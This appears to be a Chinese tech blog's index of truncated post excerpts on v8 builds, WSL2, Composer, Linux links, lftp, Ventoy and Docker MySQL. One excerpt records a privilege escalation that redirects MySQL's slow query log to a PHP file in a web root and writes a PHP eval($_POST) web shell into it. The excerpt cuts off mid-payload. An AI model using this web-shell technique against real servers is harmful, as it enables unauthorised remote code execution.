(1).configure: error: Please reinstall the v8 distribution错误原因,源码中默认读取的目录是usr/lib和/usr/include/把自己的v8复制一份过去。cp /usr/lib64/libv8.so /usr/lib/cp /usr/include/v8*  /usr/include/(2).checking for libv8_libplatform... configure: error: could not find
控制面板->程序->启用或者关闭windows功能->开启虚拟机平台,因为wsl2需要虚拟机支持
Composer是新一代的PHP依赖管理工具。其介绍和基本用法可以看这篇《Composer PHP依赖管理的新时代》。本文介绍使用Composer的五个小技巧,希望能给你的PHP开发带来方便。1. 仅更新单个库只想更新某个特定的库,不想更新它的所有依赖,很简单:composer update foo/bar此外,这个技巧还可以用来解决“警告信息问题”。你一定见过这样的警告信息:Warning: The lock file is not up to date with the
linux软连接和硬链接的区别(1).软连接软连接的创建命令:ln -s 原文件  新文件此种情况如果删除原文件,新文件也GG无法使用(2).硬链接硬连接的创建命令:ln 原文件  新文件此种情况你删除其中一个文件,对剩余的文件不影响硬链接会将2个文件通过索引节点进行链接,所以不会多占用磁盘空间
成功提权,记录一下,具体执行sql:set GLOBAL slow_query_log =1; set GLOBAL long_query_time =1; set GLOBAL slow_query_log_file = 'E:/phpStudy/WWW/25.php'; SELECT "<?php eval($_POST['a&
开篇之前,为了证明自己不是为了黑而黑,先说明对swoole和hyperf的接触(1).参考swoole捐献列表信息(其他小额的未统计,每年都有捐款):200.00    高久峰    希望 swoole 协程客户端生态越来越好    开源中国(2).我们已经购买swoole商业产品tracker的离线版(目前内网部署)(3).线上使用hyperf的项目(目前
(1).安装yum -y install lftp(2).同步本地文件到远程ftp命令lftp -u ftp账号,ftp密码 -e "mirror -R --delete --only-newer --verbose 本地目录 远程目录" ftp地址(3).可能出现的错误:Certificate verification:&nb
(1).下载ventoy这个软件,下载地址https://www.ventoy.net/en/download.html选择ventoy-1.0.29-linux.tar.gz文件下载并解压(2).插入U盘查看盘符,我的显示/dev/sda1,也就是我的U盘的盘符,你可以通过df -hl命令查看下容量对不对检查是不是自己的U盘(3).进入ventoy软件目录,执行命令:sudo sh Ventoy2Disk.sh -i /dev/sda/dev/sda1
wsl版本查看,查看wsl2版本,查看wsl版本,查看linux子系统版本。查询命令:wsl --list --verbose输出信息如下:  NAME            STATE           VERSION *&
我经常需要访问MySQL,并使用Docker临时为我创建MySQL服务器。执行命令是:docker run --name mysql \   -e MYSQL_USER=rob -e MYSQL_PASSWORD=123456 -e MYSQL_DATABASE=bookshelf \   -p 3306:3306 -d m

Top